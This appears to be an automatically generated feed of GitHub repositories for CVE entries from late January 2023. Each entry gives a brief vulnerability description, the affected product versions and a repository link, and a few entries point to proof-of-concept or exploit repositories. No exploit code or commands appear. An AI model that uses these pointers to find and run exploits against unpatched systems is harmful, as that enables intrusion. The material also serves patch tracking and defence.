**AMI Megarac Weak password hashes for Redfish & API CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40258](https://github.com/Live-Hack-CVE/CVE-2022-40258) create time: 2023-01-31T06:47:59Z

**Incorrect Privilege Assignment vulnerability in Hitachi Storage Plug-in for VMware vCenter allows remote authenticated users to cause privilege escalation. This issue affects Hitachi Storage Plug-in for VMware vCenter: from 04.9.0 before 04.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4441](https://github.com/Live-Hack-CVE/CVE-2022-4441) create time: 2023-01-31T06:47:56Z

**Incorrect Privilege Assignment vulnerability in Hitachi Storage Plug-in for VMware vCenter allows remote authenticated users to cause privilege escalation. This issue affects Hitachi Storage Plug-in for VMware vCenter: from 04.8.0 before 04.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4041](https://github.com/Live-Hack-CVE/CVE-2022-4041) create time: 2023-01-31T06:47:53Z

**In affected versions of Octopus Server the help sidebar can be customized to include a Cross-Site Scripting payload in the support link. This was initially resolved in advisory 2022-07 however it was identified that the fix could be bypassed in certain circumstances. A different approach was taken to prevent the possib CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4898](https://github.com/Live-Hack-CVE/CVE-2022-4898) create time: 2023-01-31T06:47:47Z

**Versions of the package jsuites before 5.0.1 are vulnerable to Cross-site Scripting (XSS) due to improper user-input sanitization in the Editor() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25979](https://github.com/Live-Hack-CVE/CVE-2022-25979) create time: 2023-01-31T06:47:44Z

**This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25881](https://github.com/Live-Hack-CVE/CVE-2022-25881) create time: 2023-01-31T06:47:40Z

**Versions of the package nemo-appium before 0.0.9 are vulnerable to Command Injection due to improper input sanitization in the 'module.exports.setup' function. **Note:** In order to exploit this vulnerability appium-running 0.1.3 has to be installed as one of nemo-appium dependencies. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21129](https://github.com/Live-Hack-CVE/CVE-2022-21129) create time: 2023-01-31T06:47:37Z

**A CWE-1021: Improper Restriction of Rendered UI Layers or Frames vulnerability exists that could cause an adversary to trick the interface user/admin into interacting with the application in an unintended way when the product does not implement restrictions on the ability to render within frames on external addresses. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32517](https://github.com/Live-Hack-CVE/CVE-2022-32517) create time: 2023-01-31T02:17:30Z

**Rukovoditel v3.2.1 was discovered to contain a remote code execution (RCE) vulnerability in the component /rukovoditel/index.php?module=dashboard/ajax_request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48175](https://github.com/Live-Hack-CVE/CVE-2022-48175) create time: 2023-01-31T02:17:27Z

**A CWE-287: Improper Authentication vulnerability exists that could allow an attacker to gain control of the device when logging into a web page. Affected Products: C-Bus Network Automation Controller - LSS5500NAC (Versions prior to V1.10.0), Wiser for C-Bus Automation Controller - LSS5500SHAC (Versions prior to V1.10.0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32514](https://github.com/Live-Hack-CVE/CVE-2022-32514) create time: 2023-01-31T02:17:24Z

**A CWE-295: Improper Certificate Validation vulnerability exists that could cause the CAE software to give wrong data to end users when using CAE to configure devices. Additionally, credentials could leak which would enable an attacker the ability to log into the configuration tool and compromise other devices in the ne CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32748](https://github.com/Live-Hack-CVE/CVE-2022-32748) create time: 2023-01-31T02:17:19Z

**A CWE-290: Authentication Bypass by Spoofing vulnerability exists that could cause legitimate users to be locked out of devices or facilitate backdoor account creation by spoofing a device on the local network. Affected Products: EcoStruxure™ Cybersecurity Admin Expert (CAE) (Versions prior to 2.2) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32747](https://github.com/Live-Hack-CVE/CVE-2022-32747) create time: 2023-01-31T02:17:15Z

**A CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability exists that could cause remote code execution when a command which exploits this vulnerability is utilized. Affected Products: CanBRASS (Versions prior to V7.5.1) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32512](https://github.com/Live-Hack-CVE/CVE-2022-32512) create time: 2023-01-31T02:17:12Z

**A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted log data request messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32529](https://github.com/Live-Hack-CVE/CVE-2022-32529) create time: 2023-01-31T02:17:08Z

**A CWE-306: Missing Authentication for Critical Function vulnerability exists that could cause access to manipulate and read files in the IGSS project report directory when an attacker sends specific messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.22170) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32528](https://github.com/Live-Hack-CVE/CVE-2022-32528) create time: 2023-01-31T02:17:05Z

**A CWE-668: Exposure of Resource to Wrong Sphere vulnerability exists that could cause all remote domains to access the resources (data) supplied by the server when an attacker sends a fetch request from third-party site or malicious site. Affected Products: EcoStruxure Power Commission (Versions prior to V2.22) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22732](https://github.com/Live-Hack-CVE/CVE-2022-22732) create time: 2023-01-31T02:17:01Z

**A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted alarm cache data messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32527](https://github.com/Live-Hack-CVE/CVE-2022-32527) create time: 2023-01-31T02:16:58Z

**A CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists in a function that could allow an attacker to create or overwrite critical files that are used to execute code, such as programs or libraries and cause path traversal attacks. Affected Products: EcoStruxure Pow CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22731](https://github.com/Live-Hack-CVE/CVE-2022-22731) create time: 2023-01-31T02:16:55Z

**A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted setting value messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.221 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32526](https://github.com/Live-Hack-CVE/CVE-2022-32526) create time: 2023-01-31T02:16:51Z

**A CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability exists that could allow an attacker to create or overwrite critical files that are used to execute code, such as programs or libraries and cause unauthenticated code execution. Affected Products: EcoStruxure Power Com CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0223](https://github.com/Live-Hack-CVE/CVE-2022-0223) create time: 2023-01-31T02:16:48Z

**A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted alarm data messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.22170) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32525](https://github.com/Live-Hack-CVE/CVE-2022-32525) create time: 2023-01-31T02:16:44Z

**A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted time reduced data messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32524](https://github.com/Live-Hack-CVE/CVE-2022-32524) create time: 2023-01-31T02:16:41Z

**A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted mathematically reduced data request messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Version CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32522](https://github.com/Live-Hack-CVE/CVE-2022-32522) create time: 2023-01-31T02:16:37Z

**A CWE 502: Deserialization of Untrusted Data vulnerability exists that could allow code to be remotely executed on the server when unsafely deserialized data is posted to the web server. Affected Products: Data Center Expert (Versions prior to V7.9.0) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32521](https://github.com/Live-Hack-CVE/CVE-2022-32521) create time: 2023-01-31T02:16:34Z

**A CWE-522: Insufficiently Protected Credentials vulnerability exists that could result in unwanted access to a DCE instance when performed over a network by a malicious third-party. This CVE is unique from CVE-2022-32518. Affected Products: Data Center Expert (Versions prior to V7.9.0) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32520](https://github.com/Live-Hack-CVE/CVE-2022-32520) create time: 2023-01-31T02:16:31Z

**A CWE-257: Storing Passwords in a Recoverable Format vulnerability exists that could result in unwanted access to a DCE instance when performed over a network by a malicious third-party. Affected Products: Data Center Expert (Versions prior to V7.9.0) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32519](https://github.com/Live-Hack-CVE/CVE-2022-32519) create time: 2023-01-31T02:16:27Z

**A CWE-352: Cross-Site Request Forgery (CSRF) vulnerability exists that could cause system’s configurations override and cause a reboot loop when the product suffers from POST-Based Cross-Site Request Forgery (CSRF). Affected Products: Conext™ ComBox (All Versions) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32516](https://github.com/Live-Hack-CVE/CVE-2022-32516) create time: 2023-01-31T02:16:23Z

**A CWE-307: Improper Restriction of Excessive Authentication Attempts vulnerability exists that could cause brute force attacks to take over the admin account when the product does not implement a rate limit mechanism on the admin authentication form. Affected Products: Conext™ ComBox (All Versions) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32515](https://github.com/Live-Hack-CVE/CVE-2022-32515) create time: 2023-01-31T02:16:19Z

**A CWE-521: Weak Password Requirements vulnerability exists that could allow an attacker to gain control of the device when the attacker brute forces the password. Affected Products: C-Bus Network Automation Controller - LSS5500NAC (Versions prior to V1.10.0), Wiser for C-Bus Automation Controller - LSS5500SHAC (Version CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32513](https://github.com/Live-Hack-CVE/CVE-2022-32513) create time: 2023-01-31T02:16:16Z

**An empty password in configuration file vulnerability [CWE-258] in FortiNAC version 8.3.7 and below, 8.5.2 and below, 8.5.4, 8.6.0, 8.6.5 and below, 8.7.6 and below, 8.8.11 and below, 9.1.5 and below, 9.2.3 and below may allow an authenticated attacker to access the MySQL databases via the CLI. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26117](https://github.com/Live-Hack-CVE/CVE-2022-26117) create time: 2023-01-31T02:16:12Z

**Netgear routers R7000P before v1.3.3.154, R6900P before v1.3.3.154, R7960P before v1.4.4.94, and R8000P before v1.4.4.94 were discovered to contain a pre-authentication stack overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48176](https://github.com/Live-Hack-CVE/CVE-2022-48176) create time: 2023-01-31T02:16:09Z

**On Xerox WorkCentre 3550 25.003.03.000 devices, an authenticated attacker can view the SMB server settings and can obtain the stored cleartext credentials associated with those settings. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45897](https://github.com/Live-Hack-CVE/CVE-2022-45897) create time: 2023-01-31T02:16:05Z

**The Membership For WooCommerce WordPress plugin before 2.1.7 does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4395](https://github.com/Live-Hack-CVE/CVE-2022-4395) create time: 2023-01-31T00:06:20Z

**The Panda Pods Repeater Field WordPress plugin before 1.5.4 does not sanitize and escapes a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a user having at least Contributor permission. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4306](https://github.com/Live-Hack-CVE/CVE-2022-4306) create time: 2023-01-31T00:06:13Z

**The Revive Old Posts WordPress plugin before 9.0.11 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4680](https://github.com/Live-Hack-CVE/CVE-2022-4680) create time: 2023-01-31T00:06:09Z

**The PixCodes WordPress plugin before 2.3.7 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4671](https://github.com/Live-Hack-CVE/CVE-2022-4671) create time: 2023-01-31T00:06:06Z

**The Custom User Profile Fields for User Registration WordPress plugin before 1.8.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against h CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4831](https://github.com/Live-Hack-CVE/CVE-2022-4831) create time: 2023-01-31T00:06:01Z

**The RSS Aggregator by Feedzy WordPress plugin before 4.1.1 does not validate and escape some of its block options before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as adm CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4667](https://github.com/Live-Hack-CVE/CVE-2022-4667) create time: 2023-01-31T00:05:58Z

**The Blog Designer WordPress plugin before 2.4.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4793](https://github.com/Live-Hack-CVE/CVE-2022-4793) create time: 2023-01-31T00:05:54Z

**The Justified Gallery WordPress plugin before 1.7.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4651](https://github.com/Live-Hack-CVE/CVE-2022-4651) create time: 2023-01-31T00:05:50Z

**The CC Child Pages WordPress plugin before 1.43 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4776](https://github.com/Live-Hack-CVE/CVE-2022-4776) create time: 2023-01-31T00:05:47Z

**The MediaElement.js WordPress plugin through 4.2.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high-privilege users such as admi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4699](https://github.com/Live-Hack-CVE/CVE-2022-4699) create time: 2023-01-31T00:05:43Z

**The Simple Sitemap WordPress plugin before 3.5.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4472](https://github.com/Live-Hack-CVE/CVE-2022-4472) create time: 2023-01-31T00:05:38Z

**The SAML SSO Standard WordPress plugin version 16.0.0 before 16.0.8, SAML SSO Premium WordPress plugin version 12.0.0 before 12.1.0 and SAML SSO Premium Multisite WordPress plugin version 20.0.0 before 20.0.7 does not validate that the redirect parameter to its SSO login endpoint points to an internal site URL, making CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4496](https://github.com/Live-Hack-CVE/CVE-2022-4496) create time: 2023-01-31T00:05:35Z

**The Remote Mount feature can potentially be abused by valid, authenticated users to make connections to internal services that may not normally be accessible to users. Internal service access controls, as applicable, remain in effect. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34888](https://github.com/Live-Hack-CVE/CVE-2022-34888) create time: 2023-01-31T00:05:27Z

**A buffer overflow exists in the Remote Presence subsystem which can potentially allow valid, authenticated users to cause a recoverable subsystem denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34884](https://github.com/Live-Hack-CVE/CVE-2022-34884) create time: 2023-01-31T00:05:23Z

**An arbitrary file upload vulnerability in taocms v3.0.2 allows attackers to execute arbitrary code via a crafted PHP file. This vulnerability is exploited via manipulation of the upext variable at /include/Model/Upload.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48006](https://github.com/Live-Hack-CVE/CVE-2022-48006) create time: 2023-01-31T00:05:12Z

**A buffer overflow in the WMI SMI Handler in some Lenovo models may allow an attacker with local access and elevated privileges to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40137](https://github.com/Live-Hack-CVE/CVE-2022-40137) create time: 2023-01-31T00:05:08Z

**An information leak vulnerability in SMI Handler used to configure platform settings over WMI in some Lenovo models may allow an attacker with local access and elevated privileges to read SMM memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40136](https://github.com/Live-Hack-CVE/CVE-2022-40136) create time: 2023-01-31T00:05:05Z

**An information leak vulnerability in the Smart USB Protection SMI Handler in some Lenovo models may allow an attacker with local access and elevated privileges to read SMM memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40135](https://github.com/Live-Hack-CVE/CVE-2022-40135) create time: 2023-01-31T00:05:01Z

**An information leak vulnerability in the SMI Set BIOS Password SMI Handler in some Lenovo models may allow an attacker with local access and elevated privileges to read SMM memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40134](https://github.com/Live-Hack-CVE/CVE-2022-40134) create time: 2023-01-31T00:04:57Z

**An improper input sanitization vulnerability in the Motorola MR2600 router could allow a local user with elevated permissions to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34885](https://github.com/Live-Hack-CVE/CVE-2022-34885) create time: 2023-01-31T00:04:53Z

**The Post Grid, Post Carousel, & List Category Posts WordPress plugin before 2.4.19 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0097](https://github.com/Live-Hack-CVE/CVE-2023-0097) create time: 2023-01-31T00:06:17Z

**A vulnerability in the URL filtering mechanism of Cisco AsyncOS Software for Cisco Email Security Appliance (ESA) could allow an unauthenticated, remote attacker to bypass the URL reputation filters on an affected device. This vulnerability is due to improper processing of URLs. An attacker could exploit this vulnerabi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20057](https://github.com/Live-Hack-CVE/CVE-2023-20057) create time: 2023-01-31T00:05:31Z

**Snap One Wattbox WB-300-IP-3 versions WB10.9a17 and prior could bypass the brute force protection, allowing multiple attempts to force a login. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24020](https://github.com/Live-Hack-CVE/CVE-2023-24020) create time: 2023-01-31T00:05:19Z

**Snap One Wattbox WB-300-IP-3 versions WB10.9a17 and prior use a proprietary local area network (LAN) protocol that does not verify updates to the device. An attacker could upload a malformed update file to the device and execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22315](https://github.com/Live-Hack-CVE/CVE-2023-22315) create time: 2023-01-31T00:05:16Z

**A buffer overflow in Redis 3.2.x prior to 3.2.4 causes arbitrary code execution when a crafted command is sent. An out of bounds write vulnerability exists in the handling of the client-output-buffer-limit option during the CONFIG SET command for the Redis data structure store. A crafted CONFIG SET command can lead to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-8339](https://github.com/Live-Hack-CVE/CVE-2016-8339) create time: 2023-01-30T21:54:30Z

**An exploitable heap buffer overflow vulnerability exists in the X509 certificate parsing functionality of InsideSecure MatrixSSL 3.8.7b. A specially crafted x509 certificate can cause a buffer overflow on the heap resulting in remote code execution. To trigger this vulnerability, a specially crafted x509 certificate mu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2781](https://github.com/Live-Hack-CVE/CVE-2017-2781) create time: 2023-01-30T21:54:49Z

**A denial of service vulnerability exists in the psnotifyd application of the Pharos PopUp printer client version 9.0. A specially crafted packet can be sent to the victim's computer and can lead to an out of bounds read causing a crash and a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2786](https://github.com/Live-Hack-CVE/CVE-2017-2786) create time: 2023-01-30T21:54:38Z

**An exploitable XML external entity vulnerability exists in the reporting functionality of SAP BPC. A specially crafted XML request can cause an XML external entity to be referenced, resulting in information disclosure and potential denial of service. An attacker can issue authenticated HTTP requests to trigger this vul CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16349](https://github.com/Live-Hack-CVE/CVE-2017-16349) create time: 2023-01-30T21:54:01Z

**All Samba versions 4.x.x before 4.9.17, 4.10.x before 4.10.11 and 4.11.x before 4.11.3 have an issue, where the (poorly named) dnsserver RPC pipe provides administrative facilities to modify DNS records and zones. Samba, when acting as an AD DC, stores DNS records in LDAP. In AD, the default permissions on the DNS part CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14861](https://github.com/Live-Hack-CVE/CVE-2019-14861) create time: 2023-01-30T21:54:12Z

**An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-1458](https://github.com/Live-Hack-CVE/CVE-2019-1458) create time: 2023-01-30T21:54:08Z

**OpenBSD through 6.6 allows local users to escalate to root because a check for LD_LIBRARY_PATH in setuid programs can be defeated by setting a very small RLIMIT_DATA resource limit. When executing chpass or passwd (which are setuid root), _dl_setup_env in ld.so tries to strip LD_LIBRARY_PATH from the environment, but f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19726](https://github.com/Live-Hack-CVE/CVE-2019-19726) create time: 2023-01-30T21:53:54Z

**Zoho ManageEngine Applications Manager before 13640 allows a remote authenticated SQL injection via the Agent servlet agentid parameter to the Agent.java process function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19650](https://github.com/Live-Hack-CVE/CVE-2019-19650) create time: 2023-01-30T21:53:50Z

**A vulnerability has been identified in Opcenter Execution Discrete (All versions < V3.2), Opcenter Execution Foundation (All versions < V3.2), Opcenter Execution Process (All versions < V3.2), Opcenter Intelligence (All versions < V3.3), Opcenter Quality (All versions < V11.3), Opcenter RD&L (V8.0), SIMATIC IT LMS (All CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7588](https://github.com/Live-Hack-CVE/CVE-2020-7588) create time: 2023-01-30T21:54:27Z

**A vulnerability has been identified in Opcenter Execution Discrete (All versions < V3.2), Opcenter Execution Foundation (All versions < V3.2), Opcenter Execution Process (All versions < V3.2), Opcenter Intelligence (All versions < V3.3), Opcenter Quality (All versions < V11.3), Opcenter RD&L (V8.0), SIMATIC IT LMS (All CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7587](https://github.com/Live-Hack-CVE/CVE-2020-7587) create time: 2023-01-30T21:54:23Z

**A vulnerability has been identified in Opcenter Execution Discrete (All versions < V3.2), Opcenter Execution Foundation (All versions < V3.2), Opcenter Execution Process (All versions < V3.2), Opcenter Intelligence (All versions < V3.3), Opcenter Quality (All versions < V11.3), Opcenter RD&L (V8.0), SIMATIC Notifier Se CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7581](https://github.com/Live-Hack-CVE/CVE-2020-7581) create time: 2023-01-30T21:54:16Z

**downloadFile.ashx in the Administrator section of the Surveillance module in Global RADAR BSA Radar 1.6.7234.24750 and earlier allows users to download transaction files. When downloading the files, a user is able to view local files on the web server by manipulating the FileName and FilePath parameters in the URL, or CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14946](https://github.com/Live-Hack-CVE/CVE-2020-14946) create time: 2023-01-30T21:53:57Z

**The Passster WordPress plugin before 3.5.5.8 does not escape the area parameter of its shortcode, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24837](https://github.com/Live-Hack-CVE/CVE-2021-24837) create time: 2023-01-30T21:53:39Z

**The Collapse-O-Matic WordPress plugin before 1.8.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4475](https://github.com/Live-Hack-CVE/CVE-2022-4475) create time: 2023-01-30T21:54:45Z

**The Compact WP Audio Player WordPress plugin before 1.9.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4542](https://github.com/Live-Hack-CVE/CVE-2022-4542) create time: 2023-01-30T21:54:41Z

**The Login Logout Menu WordPress plugin before 1.4.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as adm CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4625](https://github.com/Live-Hack-CVE/CVE-2022-4625) create time: 2023-01-30T21:54:34Z

**The HashBar WordPress plugin before 1.3.6 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4650](https://github.com/Live-Hack-CVE/CVE-2022-4650) create time: 2023-01-30T21:54:20Z

**The Easy Appointments WordPress plugin before 3.11.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as ad CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4668](https://github.com/Live-Hack-CVE/CVE-2022-4668) create time: 2023-01-30T21:54:05Z

**The Rate my Post WordPress plugin before 3.3.9 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4673](https://github.com/Live-Hack-CVE/CVE-2022-4673) create time: 2023-01-30T21:53:46Z

**The ShiftNav WordPress plugin before 1.7.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4627](https://github.com/Live-Hack-CVE/CVE-2022-4627) create time: 2023-01-30T21:53:42Z

**The Mongoose Page Plugin WordPress plugin before 1.9.0 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4675](https://github.com/Live-Hack-CVE/CVE-2022-4675) create time: 2023-01-30T21:53:35Z

**no description** : [julesbozouklian/PoC_CVE-2023-24055](https://github.com/julesbozouklian/PoC_CVE-2023-24055) create time: 2023-01-30T22:10:57Z

**A vulnerability in Cisco CX Cloud Agent of could allow an authenticated, local attacker to elevate their privileges. This vulnerability is due to insecure file permissions. An attacker could exploit this vulnerability by calling the script with sudo. A successful exploit could allow the attacker to take complete contro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20043](https://github.com/Live-Hack-CVE/CVE-2023-20043) create time: 2023-01-30T21:54:53Z

**This is a proof of concept for CVE-2023-24610** : [abbisQQ/CVE-2023-24610](https://github.com/abbisQQ/CVE-2023-24610) create time: 2023-01-30T21:33:46Z

**The official exploit for Froxlor Remote Code Execution CVE-2023-0315** : [mhaskar/CVE-2023-0315](https://github.com/mhaskar/CVE-2023-0315) create time: 2023-01-29T21:20:26Z

**IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 152 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1893](https://github.com/Live-Hack-CVE/CVE-2018-1893) create time: 2023-01-30T19:42:47Z

**IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 150 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1828](https://github.com/Live-Hack-CVE/CVE-2018-1828) create time: 2023-01-30T19:42:43Z

**IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 152 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1892](https://github.com/Live-Hack-CVE/CVE-2018-1892) create time: 2023-01-30T19:42:39Z

**IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 150 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1827](https://github.com/Live-Hack-CVE/CVE-2018-1827) create time: 2023-01-30T19:42:35Z

